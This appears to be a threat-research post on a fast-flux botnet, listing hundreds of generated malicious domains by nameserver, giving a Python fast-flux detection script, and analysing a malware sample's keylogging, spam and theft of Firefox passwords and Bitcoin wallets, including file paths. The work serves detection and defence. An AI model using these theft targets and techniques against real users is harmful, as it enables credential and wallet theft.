qobcovy.ru
qubeqxa.ru
ripebet.ru
rolyjyl.ru
tehomeb.ru
tejuxiv.ru
tilecak.ru
tisreyp.ru
ubbylys.ru
uhwipiq.ru
unperyh.ru
uslowyj.ru
uxzuhur.ru
uzanxyk.ru
vayvdav.ru
vesuqpu.ru
viicdim.ru
vokpaav.ru
vylengo.ru
walybhy.ru
wiofmez.ru
xokukat.ru
xuxywpe.ru
yhqinyp.ru
ykqevax.ru
ysufzub.ru
yvufraf.ru
zoryqky.ru
zyidgec.ru
zynxuih.ru
zypzieb.ru
zysaten.ru
affour.com

ns[1-6].toastop.com
arvomxo.ru
avondov.ru
begotav.ru
byypsof.ru
cyeqsov.ru
deicqig.ru
denapgo.ru
devehom.ru
dodexco.ru
dydajej.ru
ebmekis.ru
ebmeqbe.ru
egsopro.ru
ehmyqaq.ru
eqsonas.ru
eqywwoh.ru
essaruc.ru
ezhimim.ru
fafsuuq.ru
figbuar.ru
focvova.ru
fuxjiho.ru
fyefxug.ru
fyvegom.ru
hecrery.ru
hirqusu.ru
hookfiq.ru
huckazu.ru
huzgota.ru
hyqugry.ru
hyxejaj.ru
idxogow.ru
ilmagih.ru
imkaqro.ru
iwahroq.ru
ixomzob.ru
jabyrid.ru
jaccaad.ru
jemudiz.ru
jydybce.ru
kadseop.ru
kiqybur.ru
kobucco.ru
kufdeag.ru
kulegoh.ru
kylqaoq.ru
lihibir.ru
lucypek.ru
meewxib.ru
melimma.ru
mijijub.ru
miwywky.ru
mubidpy.ru
nebirza.ru
nicibma.ru
nutimad.ru
nuycmeh.ru
ofyrmaj.ru
onzomub.ru
ophopop.ru
oxcimun.ru
papiteb.ru
pesudwa.ru
pikihow.ru
poxatli.ru
pyhozod.ru
qawumqi.ru
qobcovy.ru
qubeqxa.ru
quhokle.ru
rahupvu.ru
rapfuwo.ru
ripebet.ru
rolyjyl.ru
rycgoka.ru
tehomeb.ru
tejuxiv.ru
tenbyvo.ru
tilecak.ru
tisreyp.ru
tonalog.ru
tumrexu.ru
ubbylys.ru
ufremku.ru
uhwipiq.ru
unperyh.ru
upwifav.ru
uslowyj.ru
uxzuhur.ru
uzofmep.ru
vayvdav.ru
vesuqpu.ru
vewehoh.ru
viicdim.ru
vokpaav.ru
vylengo.ru
walybhy.ru
wiofmez.ru
xakruaq.ru
xixikot.ru
xokukat.ru
xuxywpe.ru
yhqinyp.ru
ykqevax.ru
yqegpaz.ru
ysufzub.ru
yvufraf.ru
zeryqiq.ru
zihemmi.ru
zoryqky.ru
zyidgec.ru
zynxuih.ru
zypzieb.ru
zysaten.ru

ns[1-6]ocorti.com
ajgufog.ru
bogquse.ru
bylviha.ru
cuekzut.ru
cyuhtut.ru
deivwyx.ru
duebgud.ru
ehakkaz.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jygowku.ru
jykaxfy.ru
kabezer.ru
kipokfy.ru
lojseuv.ru
nilwoim.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
pidohis.ru
qiohxuv.ru
qoqwoas.ru
qoripwe.ru
raleqle.ru
ripexru.ru
sidinox.ru
suvmune.ru
tevythi.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
ocorti.com

ns[1-6]esanty.com
affuxok.ru
ajgufog.ru
bogquse.ru
cuekzut.ru
cyuhtut.ru
deivwyx.ru
duebgud.ru
ehakkaz.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jazzute.ru
jygowku.ru
jykaxfy.ru
kabezer.ru
kipokfy.ru
nilwoim.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
pidohis.ru
qiohxuv.ru
qoqwoas.ru
raleqle.ru
ripexru.ru
salyqiz.ru
sidinox.ru
suvmune.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
zuhycyc.ru

ns[1-6].frostli.com
acypruq.eu
ahvorme.eu
akdygij.eu
amjymqe.eu
anuvjiw.eu
arcelje.eu
atnywyz.eu
awwapxe.eu
axcinov.eu
behhayq.eu
bekqyma.eu
betalpo.eu
biysqix.eu
bopihwi.eu
bosoxut.eu
bozopit.eu
buzgomu.eu
cetafyb.eu
cezsyox.eu
ciapkox.eu
cirafir.eu
civadke.eu
cocyxmi.eu
cohmouz.eu
cylxaob.eu
dafodup.eu
dilecdo.eu
dimulew.eu
doiqdag.eu
dosysvi.eu
dyofjog.eu
dysfyed.eu
edkadaf.eu
efewfyr.eu
ejywqem.eu
eqvyvej.eu
erlomaj.eu
essessa.eu
esycwyf.eu
etrodhy.eu
evpytej.eu
ezadkam.eu
favorib.eu
favyjxu.eu
fepyjeb.eu
finvami.eu
fivolid.eu
fudyvis.eu
gahemqy.eu
gatocut.eu
gehgoaz.eu
gijaqqo.eu
gipahco.eu
gixseka.eu
gobyvfa.eu
godeffo.eu
goemqag.eu
gorgyli.eu
gycakus.eu
gywafdo.eu
hatahse.eu
havimpa.eu
hiahnuh.eu
hiurmuc.eu
hometxa.eu
huenhaz.eu
ibceqyz.eu
iboqfuk.eu
idbizex.eu
igfowma.eu
ihhosti.eu
ihozvab.eu
ijnihud.eu
isdogon.eu
issolme.eu
iwackim.eu
japonzo.eu
jiaftem.eu
jibagoh.eu
jibyxre.eu
jimikej.eu
jyqilge.eu
kaloliw.eu
kasytpu.eu
koqasiq.eu
kubawvu.eu
kufogku.eu
kuletif.eu
kytyvod.eu
lakedin.eu
laxnelo.eu
lelreyb.eu
lepitmi.eu
leqetso.eu
lewujix.eu
libcauf.eu
luhychu.eu
luxypuj.eu
lywaqvu.eu
macetty.eu
maficyn.eu
miqyhce.eu
monedyg.eu
mozegys.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nogomiq.eu
nugtile.eu
nuvyhne.eu
nyrylla.eu
ocbogwy.eu
ocgejim.eu
ofxawmi.eu
ogkozew.eu
okmazax.eu
ontabmy.eu
osfylqu.eu
oshefiz.eu
ovvuceq.eu
owxawic.eu
oxkyrir.eu
ozaljek.eu
paqmery.eu
pexigki.eu
poihpuh.eu
povokim.eu
pybxaur.eu
qawajky.eu
qazkaxy.eu
qofabar.eu
quxafif.eu
quzsevy.eu
qyhumet.eu
qyycdyh.eu
retarip.eu
roijtil.eu
rubhiup.eu
runuhax.eu
ruvbaiv.eu
rybunwa.eu
ryflyed.eu
rylliny.eu
saercet.eu
seenruz.eu
seybdec.eu
socriaj.eu
somavko.eu
suzzaav.eu
syfetap.eu
symapmy.eu
tivuzga.eu
tunmayz.eu
tuopbel.eu
udquget.eu
udsopof.eu
ugjypnu.eu
uhdijgi.eu
ujgitip.eu
ukxames.eu
unvevvi.eu
upyqpiz.eu
ussypoc.eu
uswohyl.eu
uxjatqo.eu
vadjani.eu
venuqdy.eu
vepucyk.eu
vizocny.eu
wabomiw.eu
wyylsic.eu
xagublo.eu
xeyhzyc.eu
xijawpa.eu
xumitza.eu
ybocqug.eu
ycpasjy.eu
yhivdob.eu
yhvotyf.eu
yjygtux.eu
ypvipja.eu
ypychuj.eu
yrhodyf.eu
ysfukiw.eu
yvadmap.eu
yvsuxel.eu
zakasoc.eu
zawfyev.eu
zequspu.eu
zexdaga.eu
ziqnypa.eu
zobubof.eu
zogaguj.eu
zoneczu.eu
zuzzuna.eu
zydnimy.eu
zyefhim.eu
zymidaf.eu
zyvacus.eu
frostli.com


ns[1-6].pizzebu.com
awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu
agomdaz.eu
ahmomyx.eu
ahvorme.eu
akdygij.eu
axcinov.eu
bemewan.eu
buzgomu.eu
cikynon.eu
cirafir.eu
ciskuur.eu
cureses.eu
ezadkam.eu
fagahmo.eu
gatocut.eu
gawgulo.eu
gixseka.eu
goemqag.eu
gyhello.eu
hatahse.eu
havimpa.eu
hometxa.eu
idbizex.eu
ileqbew.eu
imarnim.eu
japonzo.eu
jobfyre.eu
kuarzoz.eu
kuletif.eu
kytyvod.eu
lelreyb.eu
lomqybi.eu
lubigne.eu
macetty.eu
mosidgu.eu
movjihi.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nuvyhne.eu
nuzozuf.eu
ofxawmi.eu
opybxyb.eu
owlyzgi.eu
pefzota.eu
pexigki.eu
qoanxat.eu
qonerne.eu
roqeluv.eu
rylliny.eu
taksusy.eu
tugatiq.eu
udzonek.eu
uffecuj.eu
ugsowqy.eu
uhxesap.eu
ukryxyw.eu
wigiluk.eu
xumitza.eu
xuygcut.eu
xyrpavu.eu
ydbeqes.eu
yfuqcon.eu
yfynqav.eu
yjygtux.eu
yklocgu.eu
ynpysul.eu
yrhodyf.eu
ysfukiw.eu
zanpohe.eu
zyvacus.eu










awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu

pizzebu.com.
agomdaz.eu
ahmomyx.eu
ahvorme.eu
akdygij.eu
axcinov.eu
bemewan.eu
buzgomu.eu
cikynon.eu
cirafir.eu
ciskuur.eu
cureses.eu
ezadkam.eu
fagahmo.eu
gatocut.eu
gawgulo.eu
gixseka.eu
goemqag.eu
gyhello.eu
hatahse.eu
havimpa.eu
hometxa.eu
idbizex.eu
ileqbew.eu
imarnim.eu
japonzo.eu
jobfyre.eu
kuarzoz.eu
kuletif.eu
kytyvod.eu
lelreyb.eu
lomqybi.eu
lubigne.eu
macetty.eu
mosidgu.eu
movjihi.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nuvyhne.eu
nuzozuf.eu
ofxawmi.eu
opybxyb.eu
owlyzgi.eu
pefzota.eu
pexigki.eu
qoanxat.eu
qonerne.eu
roqeluv.eu
rylliny.eu
taksusy.eu
tugatiq.eu
udzonek.eu
uffecuj.eu
ugsowqy.eu
uhxesap.eu
ukryxyw.eu
wigiluk.eu
xumitza.eu
xuygcut.eu
xyrpavu.eu
ydbeqes.eu
yfuqcon.eu
yfynqav.eu
yjygtux.eu
yklocgu.eu
ynpysul.eu
yrhodyf.eu
ysfukiw.eu
zanpohe.eu
zyvacus.eu


ns[1-6]diastr.com
affuxok.ru
aglycyx.ru
agogsip.ru
ahodxil.ru
ajgufog.ru
aqcanov.ru
avondov.ru
axrohug.ru
baryqyq.ru
bixqijy.ru
bogquse.ru
borutat.ru
butawad.ru
bylviha.ru
cajuhwo.ru
cesisnu.ru
cibudit.ru
coukdyg.ru
cuhugoh.ru
cyuhtut.ru
daagtah.ru
deivwyx.ru
duebgud.ru
efdylve.ru
ehgycuj.ru
eqlasho.ru
exmotof.ru
ezirhaz.ru
fenataj.ru
fyvegom.ru
giczeca.ru
heupjeq.ru
hidafog.ru
hivagdy.ru
houktuh.ru
hugejin.ru
hyjamat.ru
iddyraq.ru
ihfajoc.ru
ixqasib.ru
jyernol.ru
kabezer.ru
kipokfy.ru
koqqeih.ru
kufdeag.ru
kulegoh.ru
kyqolby.ru
lauqpum.ru
lojseuv.ru
lojyzyt.ru
loxusyd.ru
magucjo.ru
melimma.ru
miobrav.ru
mubidpy.ru
nebirza.ru
nilwoim.ru
nimepof.ru
nougxin.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
pesudwa.ru
pidohis.ru
pokatik.ru
pubujux.ru
qiohxuv.ru
qoqwoas.ru
qoripwe.ru
quhokle.ru
raleqle.ru
ripexru.ru
rodejuj.ru
rymyheh.ru
sidinox.ru
suvmune.ru
teuxtik.ru
tevythi.ru
titepob.ru
tobjuow.ru
togpuit.ru
tonalog.ru
tozukem.ru
tyhrypo.ru
ubbylys.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
wexriyp.ru
wiewkux.ru
wyliwow.ru
xakruaq.ru
xekisuw.ru
xequjej.ru
xuzuppu.ru
xybired.ru
ygdykin.ru
ykrijyj.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
zaacvas.ru
zeryqiq.ru
zihemmi.ru
zuzilum.ru

ns[1-6]snapoli.com
affuxok.ru
ajgufog.ru
bogquse.ru
deivwyx.ru
duebgud.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jazzute.ru
kabezer.ru
kipokfy.ru
nilwoim.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
qiohxuv.ru
qoqwoas.ru
raleqle.ru
ripexru.ru
salyqiz.ru
sidinox.ru
suvmune.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
yqdazyb.ru
yvnahty.ru
zuhycyc.ru
snapoli.com


ns[1-6].firstara.com
alnykwu.in
anhozur.in
avutguz.in
azgesaj.in
bagexev.in
bemdymu.in
beruhor.in
bydxufu.in
cutrouc.in
docxymo.in
dyemheb.in
dysjeag.in
edsahug.in
egziwof.in
ejredeg.in
eptulyk.in
esqific.in
ewnupaj.in
fybildo.in
geigbeq.in
goivgek.in
gorocez.in
havowyx.in
haywsab.in
hexdoik.in
hezypez.in
hirurgy.in
honedju.in
hotfool.in
huisfeq.in
huvygmy.in
icotkik.in
iczipyk.in
iddeste.in
igtevax.in
iksutel.in
infobyt.in
itkyguh.in
ivhapuf.in
jepokfa.in
jiifxoz.in
jiquvel.in
juzuxcy.in
kaduqec.in
kiabrok.in
kufirqe.in
kyrocok.in
legycxa.in
leqozdy.in
lexucyl.in
moropdy.in
mutywro.in
myzxozy.in
negmeuw.in
nytutiv.in
ofusqar.in
oqufnyg.in
oxetpah.in
pamywuz.in
pedezby.in
pisyhyn.in
pydilaw.in
qabojir.in
qifufuk.in
raehxez.in
riwgagi.in
rufabex.in
seazdel.in
seompis.in
sinuheh.in
talutyw.in
tarraso.in
tivenyr.in
ucfensa.in
ufbofky.in
ufhewuk.in
ujjukag.in
uqtopik.in
urxiwat.in
uwhepij.in
veqyhli.in
vezkoty.in
vugozan.in
vuqfuek.in
wasidxo.in
wynzobo.in
wyvloiq.in
xategon.in
xevezby.in
xutepyj.in
xuwigir.in
yxfibet.in
yzrefyf.in
zaxseyz.in
zilziom.in
zohdoud.in
zunipaw.in
zynacha.in
firstara.com


roblect.com
akzruyh.ce.ms
apeefoacx.ce.ms
ezoglolbj.ce.ms
gcbjbamdj.ce.ms
geljoxlkd.ce.ms
himukcnen.ce.ms
hyyviccku.ce.ms
imoqjzsej.ce.ms
ljltpaffv.ce.ms
lrjvgjwmg.ce.ms
lvfksyqmz.ce.ms
mhfrhelfr.ce.ms
mkiplkooq.ce.ms
nlozaydyk.ce.ms
ouxwexphh.ce.ms
rxhndcxxi.ce.ms
shuxkzjvp.ce.ms
dlmdlemqjw.ce.ms
roblect.com


galloma.com
ajyxxun.ce.ms
avtjicn.ce.ms
bbzulty.ce.ms
bhueizz.ce.ms
bmxnbbz.ce.ms
bzzqkjk.ce.ms
cluuocw.ce.ms
cqkjibj.ce.ms
dixrkno.ce.ms
dkwhwqc.ce.ms
eymosvc.ce.ms
ezwrvsq.ce.ms
fautuzh.ce.ms
fbxmkgs.ce.ms
gnrmdds.ce.ms
hvhlazq.ce.ms
iygxhfq.ce.ms
jddpvzw.ce.ms
jejmqny.ce.ms
jlruxuf.ce.ms
jqqvqnv.ce.ms
jvhqpyj.ce.ms
ldntbtg.ce.ms
lkddqig.ce.ms
miulvnp.ce.ms
neitfvf.ce.ms
norwdyd.ce.ms
obsnkwx.ce.ms
oqylgfb.ce.ms
pyxthzm.ce.ms
qbdptev.ce.ms
rkzdnlm.ce.ms
rrfrahh.ce.ms
saogsek.ce.ms
sqwdoei.ce.ms
tazaopm.ce.ms
tyldrgy.ce.ms
ujbtapn.ce.ms
uvqyfnd.ce.ms
vwtnddd.ce.ms
wfbanyv.ce.ms
wukiuxb.ce.ms
wxatkfz.ce.ms
xalagnq.ce.ms
yvfeyyn.ce.ms
zhmeqqs.ce.ms
aadsfqle.ce.ms
aahoqmie.ce.ms
adokxrbx.ce.ms
adpiisyi.ce.ms
azyvxiqw.ce.ms
bwwrudue.ce.ms
ccybfonk.ce.ms
dlylxoca.ce.ms
dplvoghe.ce.ms
egezeqki.ce.ms
fjjlnqdt.ce.ms
flgsajeb.ce.ms
fonpxxvd.ce.ms
gwlgkror.ce.ms
gwtowtjz.ce.ms
hezfpxvr.ce.ms
iesathjc.ce.ms
iigijrqo.ce.ms
ijcyicbj.ce.ms
iupyrwes.ce.ms
kzomxpkx.ce.ms
ltaqntzd.ce.ms
ltjohroy.ce.ms
mhivnltw.ce.ms
nanxawdp.ce.ms
nhdoyayw.ce.ms
nktxmecg.ce.ms
nucmqeml.ce.ms
ogmoupcf.ce.ms
pdmhojaf.ce.ms
phlmdkkg.ce.ms
ptufrgou.ce.ms
pwhwhatr.ce.ms
qgewkpxr.ce.ms
raqdiqwr.ce.ms
reoawbqz.ce.ms
sigafisv.ce.ms
spdyccmi.ce.ms
srqdtssc.ce.ms
tfxjtthw.ce.ms
tlzfdnjv.ce.ms
twszglot.ce.ms
ulpgjmhh.ce.ms
vcrlyfcm.ce.ms
viamftgu.ce.ms
vinlgixi.ce.ms
vlyhbwqp.ce.ms
vvmqwzjd.ce.ms
wanolzyh.ce.ms
wcvlwcqz.ce.ms
wocsgoku.ce.ms
wrtetrxh.ce.ms
xacnagya.ce.ms
xbpfgoob.ce.ms
xyzrriwp.ce.ms
yclrslbn.ce.ms
yfonzetf.ce.ms
zdzmkdll.ce.ms
znfxgwwr.ce.ms
aanhryihh.ce.ms
amwthlqru.ce.ms
axikehkes.ce.ms
axrgpgnay.ce.ms
bqtvpxibn.ce.ms
bsaqfqzof.ce.ms
bugtjtgwx.ce.ms
cmuvcunas.ce.ms
cqszgtvxd.ce.ms
cwpdeuvmo.ce.ms
desajkhtt.ce.ms
dgxdydvqu.ce.ms
dhmykycap.ce.ms
djgkxulbq.ce.ms
dldbiwlib.ce.ms
dmmwbnmba.ce.ms
ebeecytff.ce.ms
eehxpgnfa.ce.ms
elvliioxz.ce.ms
ewqvmeirc.ce.ms
festcfwmb.ce.ms
fnmqkvqhc.ce.ms
fnwqxoaqd.ce.ms
gjfqabqzs.ce.ms
gkqssznth.ce.ms
glfvlbsqy.ce.ms
godlblffu.ce.ms
gxvkuefqy.ce.ms
gzwynxrdz.ce.ms
hagduqcbi.ce.ms
hbddtiimz.ce.ms
hjutzoytz.ce.ms
hpuurfkft.ce.ms
hrrdabsgc.ce.ms
hvcsfnnbl.ce.ms
hxnvbogua.ce.ms
ibhmbiujp.ce.ms
ibnrnrsca.ce.ms
ihtxwgrri.ce.ms
ikbpsegqa.ce.ms
imozsewyo.ce.ms
inyqjraby.ce.ms
iqwkvaleh.ce.ms
iqxflmwpo.ce.ms
ivejampkn.ce.ms
jhzzwrnnv.ce.ms
jkmxhwjzd.ce.ms
jmjnguloo.ce.ms
jovrpwfks.ce.ms
jrctenbni.ce.ms
khnzohexi.ce.ms
klkzahmar.ce.ms
kogqvmbyl.ce.ms
ldgtxgznq.ce.ms
ldzjcvqai.ce.ms
liowklchs.ce.ms
lqvncgwsu.ce.ms
mffhjjuyo.ce.ms
mhiyegpwm.ce.ms
mpnfrtxkb.ce.ms
mxzhmcyus.ce.ms
nbgatlklr.ce.ms
ncqpfwapp.ce.ms
nrsxuxxjk.ce.ms
nzaqohego.ce.ms
ofzdzqhgs.ce.ms
oknstngdx.ce.ms
ooiebkatd.ce.ms
oowkipkpf.ce.ms
ortshbpzv.ce.ms
oueaegkkt.ce.ms
owhhnjtvt.ce.ms
pbxyhsjcl.ce.ms
phttlfxnv.ce.ms
pnsohrgpm.ce.ms
pqqhqklih.ce.ms
qngclqeln.ce.ms
qxztybniy.ce.ms
rdmhzrzab.ce.ms
rllwnboym.ce.ms
rvbkzpsls.ce.ms
rypwddplv.ce.ms
rytfgngkw.ce.ms
sbealjyie.ce.ms
sbryweuao.ce.ms
sdgokmpmp.ce.ms
sfkgvnqll.ce.ms
shhgcqijh.ce.ms
shkrbmwiq.ce.ms
sikoastac.ce.ms
soabvshxw.ce.ms
srcfkmvtz.ce.ms
sstmzbmvc.ce.ms
szdigkjog.ce.ms
thchbcfsr.ce.ms
thxvwlnst.ce.ms
udprbpncg.ce.ms
uiniyiwze.ce.ms
upsbjrgpy.ce.ms
upthfdgon.ce.ms
uuybeevvw.ce.ms
vexojepsn.ce.ms
vojehftlt.ce.ms
vwhbcowxu.ce.ms
vwvabbujm.ce.ms
wodutsrzu.ce.ms
wyfhzlmkw.ce.ms
wzyxueqhy.ce.ms
xbaxsnihc.ce.ms
ygmehzjlg.ce.ms
yorzhrizg.ce.ms
ypflxjlzo.ce.ms
zlkaimpeq.ce.ms
ztngnmmib.ce.ms
zxtvqkftz.ce.ms
aknmlvkeho.ce.ms
apiuxcoauy.ce.ms
buygunnsnw.ce.ms
cblfdefxmf.ce.ms
cmbwsssnlo.ce.ms
cwoomqxtjo.ce.ms
dohnebpdrp.ce.ms
dyioatrhnx.ce.ms
eqqtdwbnwg.ce.ms
eyeamccxvb.ce.ms
hlmewfctuc.ce.ms
iqqspkqdji.ce.ms
jjyzwvufmb.ce.ms
jsgecgfnrw.ce.ms
kvmchjinmu.ce.ms
lglqkkqybq.ce.ms
lqsyddcoot.ce.ms
lvscrnzqzm.ce.ms
mgxstzpxfv.ce.ms
nflmyecafv.ce.ms
nmwhryeybz.ce.ms
noilnvnsie.ce.ms
nuyzxhxyqn.ce.ms
oixtvfudyd.ce.ms
pnfyoidgkn.ce.ms
pnsntpjnhw.ce.ms
pvfnpwoyjq.ce.ms
pxafmmglnp.ce.ms
qdmxpqpkbk.ce.ms
razocjpywj.ce.ms
rcmtvlzbuk.ce.ms
rljgnvkghq.ce.ms
rlybfffajb.ce.ms
rybrueryce.ce.ms
sokhxokonz.ce.ms
spuiygpbcr.ce.ms
sweaxoedyw.ce.ms
sygsgahycs.ce.ms
tepbzktaqg.ce.ms
uupkufucmx.ce.ms
vcoewypubi.ce.ms
xerrwvuuzb.ce.ms
xhmqllyufj.ce.ms
xmfydbnjgq.ce.ms
ydokioxqpc.ce.ms
yefwipbiih.ce.ms
ysjeguxpmt.ce.ms


These are lists of the IPs that ns1.boomsco.com (created 2013-01-13) and ns1.larstor.com (created 2012-12-22) have pointed to since their creation. The lists show how fast the IPs change: more than 9,000 times over 30-45 days. There are many infected hosts, but that does not mean every host in the list was infected; some IPs were used for only a second, which also demonstrates the evasive nature of the fast flux.
http://files.deependresearch.org/logs/boomsco_asn.txt
http://files.deependresearch.org/logs/larstor_asn.txt
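An added illustration of the change-rate signal described above; this is not code from the original post or its linked logs. It scores constructed resolution records (assumed layout: ISO timestamp, hostname, IP, ASN per line) by how often the nameserver's IP flips and across how many ASNs, which is what separates fast flux from ordinary round-robin within one provider.

```python
"""Fast-flux scoring of nameserver resolution records.

Added example, not code from the original post or its linked logs. The
input format (ISO timestamp, hostname, IP, ASN per line) is an assumption;
the post's boomsco/larstor logs may be laid out differently.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample: ns1.boomsco.com is the name from the post; the IPs
# (documentation ranges), ASNs (private range) and timestamps are invented.
# ns.example.net is a constructed stable control host.
SAMPLE_LOG = """\
2013-01-13T00:00:00 ns1.boomsco.com 203.0.113.10 AS64500
2013-01-13T00:00:01 ns1.boomsco.com 198.51.100.7 AS64501
2013-01-13T00:00:02 ns1.boomsco.com 203.0.113.10 AS64500
2013-01-13T00:00:05 ns1.boomsco.com 192.0.2.99 AS64502
2013-01-13T00:00:09 ns1.boomsco.com 198.51.100.7 AS64501
2013-01-13T00:00:00 ns.example.net 192.0.2.1 AS64496
2013-01-14T00:00:00 ns.example.net 192.0.2.1 AS64496
2013-01-15T00:00:00 ns.example.net 192.0.2.1 AS64496
"""


def parse_log(text):
    """Group records as {hostname: [(timestamp, ip, asn), ...]}, time-ordered."""
    by_host = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, ip, asn = line.split()
        by_host[host].append((datetime.fromisoformat(ts), ip, asn))
    for records in by_host.values():
        records.sort()
    return by_host


def flux_stats(records):
    """IP flips between consecutive observations, distinct IPs/ASNs, and the
    flip rate per day (window floored at one second so a burst still scores)."""
    flips = sum(1 for prev, cur in zip(records, records[1:]) if prev[1] != cur[1])
    span_days = (records[-1][0] - records[0][0]).total_seconds() / 86400
    return {
        "flips": flips,
        "distinct_ips": len({ip for _, ip, _ in records}),
        "distinct_asns": len({asn for _, _, asn in records}),
        "flips_per_day": flips / max(span_days, 1 / 86400),
    }


def is_fast_flux(stats, min_flips=3, min_asns=2):
    """Heuristic: repeated IP flips spread across more than one ASN. Plain
    round-robin within a single hosting provider usually stays in one ASN."""
    return stats["flips"] >= min_flips and stats["distinct_asns"] >= min_asns


def score_log(text):
    """Return {hostname: (stats, flagged)} for every host in the log."""
    result = {}
    for host, records in parse_log(text).items():
        stats = flux_stats(records)
        result[host] = (stats, is_fast_flux(stats))
    return result


if __name__ == "__main__":
    for host, (stats, flagged) in score_log(SAMPLE_LOG).items():
        print(host, "FAST-FLUX" if flagged else "stable", stats)
```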


Malware functionality and system changes
Based on 0C921935F0880B5C2161B3905F8A3069, an active fresh sample first seen by VirusTotal on 2013-02-06, with a PE date stamp of 2011-30-10.


We also analyzed fresh samples with 2013 PE date stamps and observed the same or similar functionality (some lack features such as Firefox or FTP password stealing, while others have the full set). Compared to the Dec. 2012 post by abuse.ch, the overall functionality has not changed much.



Functionality:

  • Installs WinPcap and monitors traffic
  • Keylogging capabilities
    see SetWindowsHookExW in the KERNEL32.dll imports
  • Bitcoin wallet file:
    C:\Documents and Settings\\Application Data\Bitcoin\wallet.dat
  • Parses Firefox's Password Manager local database in order to steal stored passwords. Firefox stores password data in two files: key3.db (master password / encryption key) and a 'signons' file (encrypted names and passwords). Reads:
    --%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite
    --%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db
    --%USERPROFILE%\[username]\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db
    See the SQL-related imports from ODBCJT32.dll:
    SQLGetCursorNameW
    SQLFreeStmt
    SQLGetConnectAttrW
    ConfigDialogProc
    SQLSetCursorNameW
    SQLSetStmtAttrW
    SQLFreeConnect
    SQLCloseCursor
    DefTxtFmtDlgProc
    SQLSetConnectAttrW
    SQLColumnsW
    SQLDisconnect
    SQLDriverConnectW
    SQLTablesW
    SQLGetDiagFieldW
    SQLBulkOperations
    SQLSetPos
    SQLFreeHandle
    SQLSetDescFieldW
    SQLNumResultCols
    SQLConnectW
    SQLExecute
    SQLProcedureColumnsW
    SQLFetch

  • Sends spam
    IMimeMessageTree API calls: IMimeMessageTree parses and creates Internet messages. It treats a message as a tree of bodies, where each body has a header and associated content, and gives a client the most flexible, low-level access to a message. Read more: IMimeMessageTree interface, http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx
    Imports from INETCOMM.dll:
    MimeOleSMimeCapAddCert
    MimeEditIsSafeToRun
    MimeOleUnEscapeStringInPlace
    EssSignCertificateDecodeEx
    etc.

User agents used (hardcoded in the binaries); they can be seen in memory dumps or after unpacking:
  1. Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre
  2. Mozilla/5.0 (X11; U; Linux x86_64; cy; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3
  3. Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
  4. Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6 ; nl; rv:1.9) Gecko/2008051206 Firefox/3.0
  5. Mozilla/5.0 (Windows; U; Windows NT 6.1; es-AR; rv:1.9) Gecko/2008051206 Firefox/3.0
  6. Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
  7. Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-HK; rv:1.8.1.7) Gecko Firefox/2.0
  8. Mozilla/5.0 (Windows; U; Win95; it; rv:1.8.1) Gecko/20061010 Firefox/2.0
  9. Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
  10. Mozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
